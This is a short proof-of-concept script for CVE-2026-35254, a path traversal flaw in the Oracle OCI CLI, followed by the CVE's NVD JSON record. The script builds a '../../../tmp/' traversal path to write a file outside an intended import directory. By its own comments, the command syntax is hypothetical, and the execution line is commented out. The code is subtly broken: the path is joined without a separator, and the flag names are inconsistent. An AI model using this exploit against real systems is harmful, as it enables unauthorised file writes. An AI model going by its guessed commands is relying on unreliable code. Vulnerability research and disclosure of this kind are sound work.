CVE-2026-35254

# PoC for CVE-2026-35254: Path Traversal in Oracle OCI CLI # This script demonstrates the concept of exploiting the path traversal vulnerability # by attempting to place a file outside the intended directory. import subprocess import os def exploit_path_traversal(): # Simulating the vulnerable CLI command # The vulnerability lies in the '--file' or '--output-dir' parameter accepting path traversal sequences vulnerable_cli_path = "oci" # Assuming 'oci' is in the system PATH # Intended directory for import intended_dir = "/home/user/oci_imports" # Malicious path using traversal sequences to write outside the intended directory # Example: writing to /tmp/malicious_payload.txt malicious_payload = "../../../tmp/malicious_payload.txt" # Construct the command (Hypothetical command structure based on the vulnerability description) # Note: Actual command syntax depends on the specific vulnerable CLI function command = [ vulnerable_cli_path, "import", "--file", "test_data.json", "--target-dir", intended_dir + malicious_payload ] print(f"[*] Attempting to trigger path traversal...") print(f"[*] Command: {' '.join(command)}") try: # In a real exploitation scenario, this would execute the command # result = subprocess.run(command, check=True, capture_output=True) print(f"[+] If vulnerable, file would be written to: {os.path.abspath(intended_dir + malicious_payload)}") except Exception as e: print(f"[-] Error executing command: {e}") if __name__ == "__main__": exploit_path_traversal()

{"cve": {"id": "CVE-2026-35254", "sourceIdentifier": "[email protected]", "published": "2026-05-06T08:16:03.697", "lastModified": "2026-05-06T20:30:44.910", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle OCI CLI product of Oracle Open Source Projects. The supported versions that is affected is 3.77. Easily exploitable vulnerability allows unauthenticated attacker with network access to compromise Oracle OCI CLI. Successful attacks of this vulnerability can result in Oracle OCI CLI allowing users to place imported files outside the intended directory."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:cloud_infrastructure_cli:3.77:*:*:*:*:*:*:*", "matchCriteriaId": "1BD5ED05-366E-4131-8526-3F2D62AA75EE"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/all-oracle-cves-outside-other-oracle-public-documents.html", "source": "[email protected]", "tags": ["Not Applicable"]}]}}